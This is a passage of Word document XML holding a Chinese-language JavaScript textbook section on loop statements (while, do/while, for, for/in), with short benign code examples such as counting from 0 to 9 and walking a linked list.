        <w:t>的值为假值为止。换一种说法就是当表达式</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>是真值时则循环执行</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>，注意，使用</w:t>
      </w:r>
      <w:r>
        <w:t>while(true)</w:t>
      </w:r>
      <w:r>
        <w:t>则会创建一个死循环。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常来说，我们并不想让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>反复执行同一操作。在几乎每一次循环中，都会有一个或多个变量随着循环的迭代而改变。正是由于改变了这些变量，因此每次循环执行的</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>的操作也不尽相同。而且，如果改变的变量在</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>中用到，那么每次循环表达式的值也不同。这一点非常重要，否则一个初始值为真</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>值的表达式的值永远都是真值，循环也不会结束，下面这个示例所示的</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环输出</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>之间的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var count=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(count</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(count);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count++;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可以发现，在这个例子中，变量</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>的初始值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，在循环执行过程中，它的值每次都递增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。当循环执行了</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>次，表达式的值就变成了</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（即，变量</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>的值不再小于</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>），这时</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>就会结束，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将执行程序中的下一条语句。大多数循环都会有一个像</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>这样的计数器变量。尽管循环计数器常用</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>这样的变量名，但如果想要让代码可读性更强，就应当使用更具语义的变量名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="5_5_2_do_while"/>
      <w:r>
        <w:t>5.5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环和</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环非常相似，只不过它是在循环的尾部而不是顶部</w:t>
      </w:r>
      <w:r>
        <w:t>检测循环表达式，这就意味着循环体至少会执行一次。</w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(expression);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环并不像</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环那么常用。这是因为在实践中那种想要循环至少一次的情况并不常见，下面是一个</w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function printArray(a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var len=a.length,i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(len==0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Empty Array");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>do{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(a[</w:t>
      </w:r>
      <w:r>
        <w:t>i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}while(++i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len);</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w:t>
      </w:r>
      <w:r>
        <w:t>do/while</w:t>
      </w:r>
      <w:r>
        <w:t>循环和普通的</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环之间有两点语法方面的不同之处。首先，</w:t>
      </w:r>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t>循环要求必须使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t>来标识循环的开始，用</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>来标识循环的结尾并进入循环条件判断；其次，和</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环不同，</w:t>
      </w:r>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t>循环是用分号结尾的。如果</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>的循环体使用花括号括起来的话，则</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环也不用使用分号做结尾。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="5_5_3_for"/>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句提供了一种比</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>语句更加方便的循环控制结构。</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句对常用的循环模式做了一些简化。大部分的循环都具有特定的计数器变量。在循环开始之前要初始化这个变量，然后在每次循环执行之前都检测一下它的值。最后，计数器变量做自增操作，否则就在循环结束后、下一次判断循环条件前做修改。在这一类循环中，计数器的三个关键操作是初始化、检测和更新。</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句就将这三步操作明确声明为循环语法的一部分，各自使用一个表达式来表示。</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(initialize;test;increment)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>increment</w:t>
      </w:r>
      <w:r>
        <w:t>三个表达式之间用分号分隔，它们分别负责初始化操作、循环条件判断和计数器变量的更新。将它们放在循环的第一行会更容易理解</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环正在做什么，而且也可以防止忘记初始化或者递增计数器变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要解释</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环是如何工作的，最简单的方法莫过于列出一个与之等价的</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>initialize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(test){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>increment;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换句话说，</w:t>
      </w:r>
      <w:r>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t>表达式只在循环开始之前执行一次。初始</w:t>
      </w:r>
      <w:r>
        <w:t>化表达式应当具有副作用（通常是一条赋值语句）。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样允许初始化表达式中带有</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>变量声明语句，这样的话就可以同时声明并初始化一个计数变量。每次循环执行之前会执行</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，并判断表达式的结果来决定是否执行循环体，如果</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果为真值，则执行循环体中的</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，执行</w:t>
      </w:r>
      <w:r>
        <w:t>increment</w:t>
      </w:r>
      <w:r>
        <w:t>表达式。同样，为了有用起见，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>increment</w:t>
      </w:r>
      <w:r>
        <w:t>表达式也必须具有副作用。通常来讲，它不是一个赋值表达式就是一个由</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“--”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符构成的表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在上文中的</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环的例子</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环来重写，这个循环同样输出数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var count=0;count</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;count++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(count);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，有些循环会比这些例子更加复杂，而且循环中的一次迭代会改变多个变量。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，这种情况则必须用到逗号运</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>算符，它将初始化表达式和自增表达式合并入一个表达式中以用于</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i,j;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=0,j=10;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++,j--)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sum+=i*j;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，在示例代码中的循环变量都是数字。当然数字是最常用的，但不是必需的。下面这段代码就使用</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环来遍历链表数据结构，并返回链表中的最后一个对象（也就是第一个不包含</w:t>
      </w:r>
      <w:r>
        <w:t>next</w:t>
      </w:r>
      <w:r>
        <w:t>属性的对象）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function tail(o){//</w:t>
      </w:r>
      <w:r>
        <w:t>返回链表的最后一个节点对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(;o.next;o=o.next)/*empty*/;//</w:t>
      </w:r>
      <w:r>
        <w:t>根据判断</w:t>
      </w:r>
      <w:r>
        <w:t>o.next</w:t>
      </w:r>
      <w:r>
        <w:t>是不是真值来执行遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</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需要注意的是，这段代码不包含</w:t>
      </w:r>
      <w:r>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中那三个表达式中的任何一个都可以忽略，但是两个分</w:t>
      </w:r>
      <w:r>
        <w:t>号必不可少。如果省略</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，那么这将是一个死循环，同样，和</w:t>
      </w:r>
      <w:r>
        <w:t>while(true)</w:t>
      </w:r>
      <w:r>
        <w:t>类似，死循环的另外一种写法是</w:t>
      </w:r>
      <w:r>
        <w:t>for(;;)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="5_5_4_for_in"/>
      <w:r>
        <w:t>5.5.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>语句也使用</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，但它是和常规的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环完全不同的一类循环。</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环语句的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(variable in object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>variable</w:t>
      </w:r>
      <w:r>
        <w:t>通常是一个变量名，也可以是一个可以产生左值的表达式或者一个通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句声明的变量，总之必须是一个适用于赋值表达式左侧的值。</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>是一个表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>这个表达式的计算结果是一个对象。同样，</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>是一个语句或语句块，它构成了循环的主体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环来遍历数组元素是非常简单的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++)//i</w:t>
      </w:r>
      <w:r>
        <w:t>代表了数组元素的索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(a[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出数组中的每个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环则是用来更方便地遍历对象属性成员：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p in o)//</w:t>
      </w:r>
      <w:r>
        <w:t>将属性名字赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(o[p]);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出每一个属性的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
